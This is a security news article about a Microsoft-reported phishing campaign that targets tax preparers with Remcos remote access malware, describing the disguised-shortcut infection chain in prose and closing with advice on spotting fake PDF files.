Microsoft has issued an alert on a phishing email effort that targets tax preparers and accounting companies. It uses remote access malware to gain initial access to business networks.
As the USA approaches the end of its annual tax season, accountants are scrambling to collect their customers’ tax records.
Because of this, it’s a prime opportunity for threat actors to target tax preparers. Hoping that they may unintentionally open harmful files while less busy.
Microsoft Office 365 company recognises this in a fresh phishing email scheme aimed at tax experts. Specially designed to spread the malware Remcos – a remote access trojan.
With U.S. Tax Day approaching, Microsoft observed phishing email attacks targeting accounting and tax return preparation organizations to deliver the Remcos. Moreover, to compromise target networks beginning in February of this year.
Focusing on tax experts
The phishing emails appear to be from clients submitting the required paperwork to finish their tax returns.
The subject line of a phishing email spotted by Microsoft 365 company says, “I apologise for not responding sooner; our tax return should be simple and not require much of your time.
I think you’d need a copy of our most recent year’s tax paperwork for the W-2s, 1099s, mortgages, interest, gifts, medical investments, and HSAs.”
These phishing emails contain links that avoid detection by security software and use click-tracking services. These URLs eventually take the user to a file-hosting site where a ZIP package is downloaded.
Many items in this ZIP bundle masquerade as PDF files for different tax forms, but they are Windows shortcuts.
These Windows shortcuts, when double-clicked, launch PowerShell to download a highly obscured VBS file from a remote site, which is then run and stored to C:WindowsTasks.
To avoid raising the targeted person’s suspicion, the VBS script will download a fake PDF file, and open it in Microsoft.
The GuLoader malware will be downloaded and executed by these VBS scripts. According to Microsoft 365 Office company, it will then install the Remcos remote access trojan.
According to the security service website, hackers frequently employ Remcos in phishing emails to obtain early access to corporate networks.
With this access, they infect more devices and go farther along the network, stealing data and installing other malware.
Microsoft claims phishing email operations frequently use tax-related themes. However, this effort is unique in that it primarily targets tax preparation businesses and individuals.
“These campaigns are specific and targeted in a way that is unusual. Though social engineering traps like this one are common around Tax Day and other hot-button current events.”
Targeted Businesses
The threat mainly targets businesses that prepare taxes, provide financial services, or provide professional tax and bookkeeping services.
An accounting firm’s data breach impacts many people because they handle extremely sensitive information for both individuals and businesses.
Users are advised to allow the display of file extensions in Windows so they can recognise suspicious files. As the first loaders for the malware in this campaign are malicious files masquerading as PDF files.
Unfortunately, despite using the.lnk file extension, Windows shortcuts are a unique file format that does not display the file extension when shown in File Explorer.
This behaviour makes it more challenging to determine whether a file is indeed a hidden shortcut. However, displaying files in File Explorer’s ‘Details’ mode will reveal that it is a Windows Shortcut. Thus, making it a little bit simpler to identify.
Users should not accept attachments or click links in emails without first making sure the sender is trustworthy. Delete the email if not.
